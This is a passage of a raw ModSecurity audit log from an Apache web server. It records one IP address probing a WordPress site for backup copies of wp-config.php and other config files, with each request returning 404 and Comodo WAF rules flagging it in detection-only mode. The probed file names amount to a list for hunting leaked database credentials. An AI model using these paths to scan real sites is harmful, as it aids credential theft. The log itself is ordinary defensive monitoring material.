Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --2239d36a-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --2239d36a-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/wp-config.php.cust"] [unique_id "aE3pGCQOy0yoNZQ7dslNrgAAAAk"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/evofoot.in/httpdocs/wp-config.php.cust' not found or unable to stat Stopwatch: 1749936408518897 3365 (- - -) Stopwatch2: 1749936408518897 3365; combined=2042, p1=364, p2=1599, p3=0, p4=0, p5=79, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2239d36a-Z-- --a6c02909-A-- [15/Jun/2025:02:56:48.632398 +0530] aE3pGJ4hb3-ZG-auIyDOOgAAAAg 185.177.72.108 60954 127.0.0.1 7080 --a6c02909-B-- GET /wp-config.php.disabled HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --a6c02909-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --a6c02909-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/wp-config.php.disabled"] [unique_id "aE3pGJ4hb3-ZG-auIyDOOgAAAAg"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/evofoot.in/httpdocs/wp-config.php.disabled' not found or unable to stat Stopwatch: 1749936408629451 3027 (- - -) Stopwatch2: 1749936408629451 3027; combined=1685, p1=378, p2=1250, p3=0, p4=0, p5=57, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a6c02909-Z-- --98d4875b-A-- [15/Jun/2025:02:56:48.742600 +0530] aE3pGOXds7bzDL-AINRY1AAAAAM 185.177.72.108 60960 127.0.0.1 7080 --98d4875b-B-- GET /wp-config.php.new HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --98d4875b-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --98d4875b-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/wp-config.php.new"] [unique_id "aE3pGOXds7bzDL-AINRY1AAAAAM"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/evofoot.in/httpdocs/wp-config.php.new' not found or unable to stat Stopwatch: 1749936408739624 3030 (- - -) Stopwatch2: 1749936408739624 3030; combined=1743, p1=318, p2=1364, p3=0, p4=0, p5=61, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --98d4875b-Z-- --0d6aa324-A-- [15/Jun/2025:02:56:48.854054 +0530] aE3pGNlaOcxgn8EdjwOwEgAAAAc 185.177.72.108 60964 127.0.0.1 7080 --0d6aa324-B-- GET /wp-config.php.orig HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --0d6aa324-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --0d6aa324-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/wp-config.php.orig"] [unique_id "aE3pGNlaOcxgn8EdjwOwEgAAAAc"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/evofoot.in/httpdocs/wp-config.php.orig' not found or unable to stat Stopwatch: 1749936408851016 3091 (- - -) Stopwatch2: 1749936408851016 3091; combined=1749, p1=407, p2=1260, p3=0, p4=0, p5=82, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0d6aa324-Z-- --33efb335-A-- [15/Jun/2025:02:56:48.974409 +0530] aE3pGOQxpfcsz2uNnR-jugAAAAI 185.177.72.108 60972 127.0.0.1 7080 --33efb335-B-- GET /wp-config.php.original HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --33efb335-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --33efb335-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/wp-config.php.original"] [unique_id "aE3pGOQxpfcsz2uNnR-jugAAAAI"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/evofoot.in/httpdocs/wp-config.php.original' not found or unable to stat Stopwatch: 1749936408970561 3917 (- - -) Stopwatch2: 1749936408970561 3917; combined=2413, p1=446, p2=1889, p3=0, p4=0, p5=78, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --33efb335-Z-- --855b8943-A-- [15/Jun/2025:02:56:49.087096 +0530] aE3pGTpSduy_dUF9ffnDxQAAAAU 185.177.72.108 60974 127.0.0.1 7080 --855b8943-B-- GET /wp-config.php.swn HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --855b8943-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --855b8943-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/wp-config.php.swn"] [unique_id "aE3pGTpSduy_dUF9ffnDxQAAAAU"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/evofoot.in/httpdocs/wp-config.php.swn' not found or unable to stat Stopwatch: 1749936409083787 3362 (- - -) Stopwatch2: 1749936409083787 3362; combined=1917, p1=423, p2=1434, p3=0, p4=0, p5=60, sr=109, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --855b8943-Z-- --51839748-A-- [15/Jun/2025:02:56:49.197209 +0530] aE3pGSQOy0yoNZQ7dslNrwAAAAk 185.177.72.108 60984 127.0.0.1 7080 --51839748-B-- GET /wp-config.php.swo HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --51839748-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --51839748-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/wp-config.php.swo"] [unique_id "aE3pGSQOy0yoNZQ7dslNrwAAAAk"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/evofoot.in/httpdocs/wp-config.php.swo' not found or unable to stat Stopwatch: 1749936409194294 2978 (- - -) Stopwatch2: 1749936409194294 2978; combined=1711, p1=378, p2=1275, p3=0, p4=0, p5=58, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --51839748-Z-- --f3abab22-A-- [15/Jun/2025:02:56:49.307477 +0530] aE3pGW1_24bael5AsqHJCQAAAAo 185.177.72.108 60994 127.0.0.1 7080 --f3abab22-B-- GET /wp-config.php_ HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --f3abab22-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --f3abab22-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/wp-config.php_"] [unique_id "aE3pGW1_24bael5AsqHJCQAAAAo"] Stopwatch: 1749936409304532 2999 (- - -) Stopwatch2: 1749936409304532 2999; combined=1814, p1=348, p2=1410, p3=0, p4=0, p5=55, sr=93, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f3abab22-Z-- --fae2ed40-A-- [15/Jun/2025:02:56:49.417815 +0530] aE3pGdlaOcxgn8EdjwOwEwAAAAc 185.177.72.108 56516 127.0.0.1 7080 --fae2ed40-B-- GET /wp-config.php_1 HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --fae2ed40-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --fae2ed40-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/wp-config.php_1"] [unique_id "aE3pGdlaOcxgn8EdjwOwEwAAAAc"] Stopwatch: 1749936409414735 3134 (- - -) Stopwatch2: 1749936409414735 3134; combined=1912, p1=358, p2=1500, p3=0, p4=0, p5=54, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fae2ed40-Z-- --6873cc43-A-- [15/Jun/2025:02:56:49.538088 +0530] aE3pGeQxpfcsz2uNnR-juwAAAAI 185.177.72.108 56518 127.0.0.1 7080 --6873cc43-B-- GET /wp-config.php_bak HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --6873cc43-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --6873cc43-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/wp-config.php_bak"] [unique_id "aE3pGeQxpfcsz2uNnR-juwAAAAI"] Stopwatch: 1749936409534326 3833 (- - -) Stopwatch2: 1749936409534326 3833; combined=2331, p1=534, p2=1725, p3=0, p4=0, p5=72, sr=133, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6873cc43-Z-- --03cb6877-A-- [15/Jun/2025:02:56:49.757450 +0530] aE3pGfCFSLfJixou_W0kzAAAAAY 185.177.72.108 56534 127.0.0.1 7080 --03cb6877-B-- GET /wp-config.php_new HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --03cb6877-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --03cb6877-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/wp-config.php_new"] [unique_id "aE3pGfCFSLfJixou_W0kzAAAAAY"] Stopwatch: 1749936409753642 3876 (- - -) Stopwatch2: 1749936409753642 3876; combined=2354, p1=446, p2=1833, p3=0, p4=0, p5=74, sr=120, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --03cb6877-Z-- --8d5b3072-A-- [15/Jun/2025:02:56:49.868898 +0530] aE3pGTpSduy_dUF9ffnDxgAAAAU 185.177.72.108 56538 127.0.0.1 7080 --8d5b3072-B-- GET /wp-config.php_Old HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --8d5b3072-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --8d5b3072-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/wp-config.php_Old"] [unique_id "aE3pGTpSduy_dUF9ffnDxgAAAAU"] Stopwatch: 1749936409864695 4290 (- - -) Stopwatch2: 1749936409864695 4290; combined=2610, p1=542, p2=1994, p3=0, p4=0, p5=73, sr=128, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8d5b3072-Z-- --b2c8bd18-A-- [15/Jun/2025:02:56:49.979929 +0530] aE3pGW1_24bael5AsqHJCgAAAAo 185.177.72.108 56542 127.0.0.1 7080 --b2c8bd18-B-- GET /config.bak HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --b2c8bd18-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --b2c8bd18-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.evofoot.in"] [uri "/config.bak"] [unique_id "aE3pGW1_24bael5AsqHJCgAAAAo"] Stopwatch: 1749936409976166 3837 (- - -) Stopwatch2: 1749936409976166 3837; combined=2247, p1=477, p2=1694, p3=0, p4=0, p5=76, sr=130, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b2c8bd18-Z-- --9ff92803-A-- [15/Jun/2025:02:56:50.517169 +0530] aE3pGvCFSLfJixou_W0kzQAAAAY 185.177.72.108 56562 127.0.0.1 7080 --9ff92803-B-- GET /config.dat HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --9ff92803-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --9ff92803-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".dat"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".dat"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.evofoot.in"] [uri "/config.dat"] [unique_id "aE3pGvCFSLfJixou_W0kzQAAAAY"] Stopwatch: 1749936410513197 4057 (- - -) Stopwatch2: 1749936410513197 4057; combined=2482, p1=459, p2=1943, p3=0, p4=0, p5=80, sr=135, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9ff92803-Z-- --96ded07c-A-- [15/Jun/2025:02:56:50.628271 +0530] aE3pGjpSduy_dUF9ffnDxwAAAAU 185.177.72.108 56576 127.0.0.1 7080 --96ded07c-B-- GET /config.inc HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --96ded07c-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --96ded07c-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".inc"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".inc"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.evofoot.in"] [uri "/config.inc"] [unique_id "aE3pGjpSduy_dUF9ffnDxwAAAAU"] Stopwatch: 1749936410624793 3532 (- - -) Stopwatch2: 1749936410624793 3532; combined=2126, p1=326, p2=1744, p3=0, p4=0, p5=55, sr=99, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --96ded07c-Z-- --8dff9749-A-- [15/Jun/2025:02:56:50.738983 +0530] aE3pGiQOy0yoNZQ7dslNsQAAAAk 185.177.72.108 56586 127.0.0.1 7080 --8dff9749-B-- GET /config.inc.bak HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --8dff9749-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --8dff9749-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".inc.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".inc.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.evofoot.in"] [uri "/config.inc.bak"] [unique_id "aE3pGiQOy0yoNZQ7dslNsQAAAAk"] Stopwatch: 1749936410735720 3317 (- - -) Stopwatch2: 1749936410735720 3317; combined=1886, p1=386, p2=1437, p3=0, 